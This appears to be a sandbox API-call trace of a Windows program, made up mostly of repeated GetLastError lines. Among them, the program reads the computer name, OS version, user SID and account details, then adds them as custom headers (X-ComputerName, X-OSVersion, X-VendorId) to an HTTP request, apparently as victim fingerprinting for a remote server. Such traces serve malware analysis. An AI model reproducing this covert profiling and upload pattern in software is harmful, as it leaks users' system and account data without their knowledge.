	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0111.980] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.017] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.018] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.019] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetLastError () returned 0x0
	[0112.020] GetComputerNameW (in: lpBuffer=0x689390, nSize=0x205f400 | out: lpBuffer="X2VS1CUM", nSize=0x205f400) returned 1
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.020] GetLastError () returned 0xcb
	[0112.021] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] GetLastError () returned 0xcb
	[0112.089] wsprintfW (in: param_1=0x669f08, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0112.089] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0112.089] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0112.089] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.090] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.091] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.108] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] GetLastError () returned 0x0
	[0112.117] wsprintfW (in: param_1=0x669f08, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0112.117] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0112.117] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] GetLastError () returned 0x0
	[0112.118] wsprintfW (in: param_1=0x669f08, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0112.118] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0112.118] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0112.118] GetCurrentProcess () returned 0xffffffff
	[0112.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205f2c4 | out: TokenHandle=0x205f2c4*=0x694) returned 1
	[0112.118] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205f2a0 | out: TokenInformation=0x0, ReturnLength=0x205f2a0) returned 0
	[0112.118] GetLastError () returned 0x7a
	[0112.119] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x1, TokenInformation=0x392af78, TokenInformationLength=0x24, ReturnLength=0x205f2a0 | out: TokenInformation=0x392af78, ReturnLength=0x205f2a0) returned 1
	[0112.119] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x392af80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x698ee8, cchName=0x205f294, ReferencedDomainName=0x69a540, cchReferencedDomainName=0x205f294, peUse=0x205f288 | out: Name="Nd9E1FYi", cchName=0x205f294, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x205f294, peUse=0x205f288) returned 1
	[0112.120] CloseHandle (hObject=0x694) returned 1
	[0112.120] CloseHandle (hObject=0xffffffff) returned 1
	[0112.120] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39ac900*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x1867722, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39ac997, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.123] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.124] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.128] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.129] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.130] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
	[0112.131] GetLastError () returned 0x0
